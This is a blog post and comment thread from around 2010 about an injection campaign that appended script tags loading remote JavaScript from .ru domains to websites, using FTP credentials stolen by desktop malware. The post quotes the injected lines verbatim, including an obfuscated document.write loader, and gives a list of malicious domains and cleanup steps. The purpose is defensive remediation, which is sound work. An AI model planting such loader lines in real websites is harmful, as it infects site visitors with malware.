Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!
I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only and search and fix.
Click here to see the .RU Removal Script in action! (demo)
or…
Click here for the .RU Removal Script Source Code
or here for it on PasteBin
Let me know in the comments if it works for you or if you have any feature requests!
Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.
It looks like this in JavaScript files:
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');
PHP or HTML files contain the following at the end:
<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script> <!--3848d52fcd665b3d7d96c22e5b6a5451-->
Here is a short list of some domain names that we’ve come across…
Known Malicious Domains:
- pocketbloke.ru
- inkrainbow.ru
- pantsletter.ru
- fightkid.ru
- shirtdifficulty.ru
- casechick.ru
- obscurewax.ru
- nuttypiano.com
- Many others… (comment domains you find below)
STEPS TO TAKE TO REMOVE THE THREAT:
- Run MalwareBytes and get rid of anything on your machine
- Uninstall your FTP client
- Change your FTP passwords
- Update JAVA – According to this CERT KB
- Remove all traces of the scripts from your domains
UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.
No. If you get infected again by visiting an infected site or getting an infected email, it’ll start all over again. Use FZ by all means, but don’t store passwords in it.
@Default User
As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.
The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.
And maybe even some other traffic like cPanel and browser login storage. Who knows what it can find.
Use Keepass, and just like with FZ dont save P/W in your browsers. Instal qfxsoftware.com’s Keyscrambler to evade those sniffers
Hi…
I’m a regular pc user like most and only use the web to access my facebook,news etc. I don’t use any ftp clients like fz. But the other day i checked my log after my scheduled virus scan,and there it was: pocketbloke.ru/facebook.js
To me this indicates that somehow,somewhere when using Facebook this happened. I cleaned up the mess as best i could by using Malwarebytes Anti Malware and Nod32 (quarantined).
So my questions are: Are Facebook users in danger now and should i report this to Fb hq?,and should i to be sure maby reinstall my os and change my passwords to Facebook,Windows live messenger etc.?
“All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only and search and fix.”
You can more about this?
That is another website, pantscow.ru
Hey Can we somehow edit the code of your script to add some other text
which needs to be removed.
I mean if infection is from included infections in your code.